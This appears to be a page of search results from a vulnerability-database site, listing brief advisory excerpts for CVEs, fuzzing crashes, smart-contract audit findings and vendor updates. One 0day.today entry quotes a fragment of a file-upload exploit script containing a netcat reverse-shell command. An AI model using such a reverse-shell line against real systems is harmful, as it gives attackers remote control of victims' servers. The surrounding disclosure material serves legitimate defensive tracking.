11967 matches found

Talos
added 2024/01/10 12:0 a.m. | 29 views

WWBN AVideo checkLoginAttempts login attempt restriction bypass vulnerability

Talos Vulnerability Report TALOS-2023-1898 WWBN AVideo checkLoginAttempts login attempt restriction bypass vulnerability January 10, 2024 CVE Number CVE-2023-49810 SUMMARY A login attempt restriction bypass vulnerability exists in the checkLoginAttempts functionality of WWBN AVideo dev master...

7.3 CVSS | 7.1 AI score | 0.00668 EPSS
Exploits: 1
Prion
added 2024/01/09 10:15 a.m. | 15 views

Out-of-bounds

A vulnerability has been identified in Solid Edge SE2023 All versions V223.0 Update 10. The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted PAR files. This could allow an attacker to execute code in the context of the...

4.4 CVSS | 7.3 AI score | 0.00201 EPSS
Exploits: 0 | References: 1 | Affected Software: 1
Fedora
added 2023/12/29 1:14 a.m. | 43 views

[SECURITY] Fedora 39 Update: podman-tui-0.15.0-1.fc39

podman-tui is a terminal user interface for Podman v4. podman-tui is using podman.socket service to communicate with podman environment and SSH to connect to remote podman machines...

5.9 CVSS | 6.9 AI score | 0.93305 EPSS
Exploits: 4
Circl
added 2023/12/24 3:26 p.m. | 20 views

CVE-2023-44221

creationtimestamp | type | source
---|---|---
2023-12-24 15:26:20+00:00 | seen | https://t.me/ctinow/159038
2025-04-30 16:18:31+00:00 | seen | https://infosec.exchange/users/cR0w/statuses/114427816217281348
2025-04-30 18:14:13+00:00 | seen | https://t.me/DarkWebInformerCVEAlerts/14107
2025-05-01...

7.2 CVSS | 7.4 AI score | 0.74933 EPSS
Exploits: 0 | References: 68
OSV
added 2023/12/18 8:1 p.m. | 14 views

GHSA-W8VH-P74J-X9XP yii2-authclient vulnerable to possible timing attack on string comparison in OAuth1, OAuth2 and OpenID Connect implementation

Impact What kind of vulnerability is it? Who is impacted? Original Report: The Oauth1/2 "state" and OpenID Connect "nonce" is vulnerable for a "timing attack" since it's compared via regular string comparison instead of Yii::$app->getSecurity()->compareString(). Affected Code: 1. OAuth 1 "state"...

9.4 AI score | 0.00716 EPSS
Exploits: 1 | References: 7
Tenable Nessus
added 2023/12/18 12:0 a.m. | 12 views

Input Reflected

This is an informational plugin to inform that user data controlled input is reflected in the response. No source data...

7.2 AI score
Exploits: 0 | References: 1
OSV
added 2023/12/14 12:13 a.m. | 4 views

OSV-2023-1302 Global-buffer-overflow in pcre_get_compiled_regex_cache_ex

OSS-Fuzz report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=65030 Crash type: Global-buffer-overflow READ 1 Crash state: pcre_get_compiled_regex_cache_ex php_replace_in_subject preg_replace_common...

7.2 AI score
Exploits: 0 | References: 1
Openbugbounty
added 2023/12/12 7:23 a.m. | 11 views

online.moysklad.ru Cross Site Scripting vulnerability OBB-3810857

Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently hidde...

6.2 AI score
Exploits: 0
Code423n4
added 2023/12/08 12:0 a.m. | 14 views

Incorrect Condition for Validating Input and Output Tokens in CurveTricryptoAdapter::_determineComputeType Function

Lines of code Vulnerability details Impact The contract contains a bug in the _determineComputeType function, where the condition for checking if the input and output tokens are valid for swapping is incorrect. This bug may lead to unexpected behavior and incorrect computation of the compute type...

7 AI score
Exploits: 0
Chainguard
added 2023/12/06 5:15 p.m. | 65 views

CVE-2023-39326 vulnerabilities

Vulnerabilities for packages: prometheus-beat-exporter-fips, cni-plugins-fips, mage, kube-logging-logging-operator, petname, metrics-server, hubble-ui, bank-vaults-fips, prometheus-stackdriver-exporter, configmap-reload-fips, ctop, fulcio-fips, flannel-cni-plugin, go-bindata, gobuster, gops,...

5.3 CVSS | 6.7 AI score | 0.01208 EPSS
Exploits: 0
CNVD
added 2023/12/06 12:0 a.m. | 9 views

China's bidding and tendering public service platform has information leakage vulnerability

China's bidding and tendering public service platform provides market public information services for bidding and tendering transaction platforms and parties, realizing the pooling, sharing, dynamics and openness of market information, and providing data support for regulating and supervising the...

6.7 AI score
Exploits: 0
Cvelist
added 2023/12/05 3:4 a.m. | 33 views

CVE-2023-33092 Buffer Copy Without Checking Size of Input in Bluetooth HOST

Memory corruption while processing pin reply in Bluetooth, when pin code received from APP layer is greater than expected size...

8.4 CVSS | 8.8 AI score | 0.00159 EPSS
Exploits: 0 | References: 1
0day.today
added 2023/11/30 12:0 a.m. | 549 views

Online Student Clearance System 1.0 Shell Upload Exploit

!/usr/bin/python3 Exploit Title: Online Student Clearance System - Unrestricted File Upload to RCE Authenticated Date: 28/11/2023 Exploit Author: Akash Pandey aka l3v1ath0n Version: &1|nc " + localip + " " + localport + " /tmp/f" Firing request to login logurl = weburl+"login.php" Telling script ...

7.5 CVSS | 7.4 AI score | 0.00512 EPSS
Exploits: 4
Chainguard
added 2023/11/29 12:30 p.m. | 26 views

GHSA-VMQ6-5M68-F53M vulnerabilities

Vulnerabilities for packages: tez, trino, zookeeper...

5.8 AI score
Exploits: 0
Code423n4
added 2023/11/29 12:0 a.m. | 8 views

Interface improperly implemented

Lines of code 34, 34, 34, 34, 30, 31, 32, 34, 35, 38 https://github.com/Tapioca-DAO/tapioca-yieldbox-strategies-audi...

7.1 AI score
Exploits: 0
Tenable Nessus
added 2023/11/29 12:0 a.m. | 20 views

RHEL 8 : firefox (RHSA-2023:7569)

The remote Redhat Enterprise Linux 8 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2023:7569 advisory. Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox...

8.8 CVSS | 7.7 AI score | 0.01406 EPSS
Exploits: 0 | References: 16
OSV
added 2023/11/27 1:3 p.m. | 10 views

OSV-2023-1227 Stack-buffer-overflow in io_memory_read

OSS-Fuzz report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=64529 Crash type: Stack-buffer-overflow WRITE 11 Crash state: io_memory_read r_io_plugin_read r_io_desc_read...

7.2 AI score
Exploits: 0 | References: 1
Code423n4
added 2023/11/15 12:0 a.m. | 41 views

Funds cannot be withdrawn from EigenLayer

Lines of code Vulnerability details Impact NodeDelegator contracts handle depositing LSTs into EigenLayer to earn yield. However the contract lacks functions to withdraw those tokens afterwards, meaning they will become trapped in the EigenLayer protocol. This breaks the functionality of the...

7 AI score
Exploits: 0
Schneier on Security
added 2023/11/14 5:1 p.m. | 14 views

Upcoming Speaking Engagements

This is a current list of where and when I am scheduled to speak: I'm speaking at the AI Summit New York on December 6, 2023. The list is maintained on this page...

7.2 AI score
Exploits: 0
OSV
added 2023/11/13 1:3 p.m. | 9 views

OSV-2023-1154 Heap-buffer-overflow in pcpp::SomeIpSdEntry::SomeIpSdEntry

OSS-Fuzz report: https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=64127 Crash type: Heap-buffer-overflow READ 4 Crash state: pcpp::SomeIpSdEntry::SomeIpSdEntry pcpp::SomeIpSdLayer::getEntries readParsedPacket...

7.2 AI score
Exploits: 0 | References: 1